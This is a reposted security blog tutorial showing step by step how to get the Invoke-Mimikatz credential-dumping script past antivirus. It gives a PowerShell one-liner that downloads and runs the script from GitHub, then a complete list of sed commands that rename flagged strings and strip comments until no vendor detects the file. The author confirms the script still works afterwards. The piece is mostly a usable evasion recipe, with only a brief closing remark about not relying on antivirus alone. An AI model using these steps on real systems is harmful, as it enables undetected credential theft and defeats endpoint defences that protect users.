How to Bypass Anti-Virus to Run Mimikatz

[Nytro]

How to Bypass Anti-Virus to Run Mimikatz

Carrie Roberts //

 

Would you like to run Mimikatz without Anti-Virus (AV) detecting it? Recently I attempted running the PowerShell script “Invoke-Mimikatz” from PowerSploit on my machine but it was flagged by Windows Defender as malicious when saving the file to disk. Even when I ran this file without writing it to disk using the following command it still got caught.

powershell "IEX (New-Object Net.WebClient).DownloadString
('https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/
Invoke-Mimikatz.ps1');Invoke-Mimikatz"

 

Windows Defender Detects Unmodified Mimikatz Script

Uploading the Invoke-Mimikatz.ps1 file to VirusTotal showed that 19 of 54 AV vendors currently detect this file as malicious.

 

AV Detection Rate for Unmodified Mimikatz Script

As you may know, AV detection schemes can be weak, simply looking for specific words in the file. Often these words can be changed without changing the functionality. For example, changing “Invoke-Mimikatz” to “Invoke-Mimidogz” using the following Linux command brings the detection rate down to 8 of 54

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1

AV Detection Rate for “Katz” to “Dogz”

And how about getting rid of those unnecessary comments in the script?

sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1

AV Detection Ratio After Removing Comments from Script

We are down to four (4) AV vendors detecting the malicious file after renaming “Katz” to “Dogz” and removing comments. A little further experimentation shows that AV doesn’t like the word “DumpCreds”, let’s change it to “DumpCred”.

sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1

 

AV Detection After Renaming “DumpCreds”

We are down to only two AV vendors detecting this file as malicious now. We could probably quit here and get a lot of mileage out of this script because who has even heard of those AV vendors anyway? But as my daughter would say after reading the disclaimer on hand sanitizer, “Why don’t they just put a little bit more in and kill ‘em all!?”

 

 

So let’s do this. Just add three more match and replace rules and “Winner, winner, chicken dinner!” The complete list of match and replace commands is listed below.

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1

sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1

sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' 
Invoke-Mimikatz.ps1

sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions 
\$Win32Functions #\-/g" Invoke-Mimikatz.ps1

 

No AV Detection After Match and Replace Rules

 

 

We successfully modified the Mimikatz script to avoid AV detection without changing the functionality. Great evidence to why you should not rely solely on your AV for protection.

 

 

Modified Mimikatz Script Still Functional

For additional information on bypassing Anti-Virus, check out the “Sacred Cash Cow Tipping” webcast series.

 

 

Sursa: http://www.blackhillsinfosec.com/?p=5555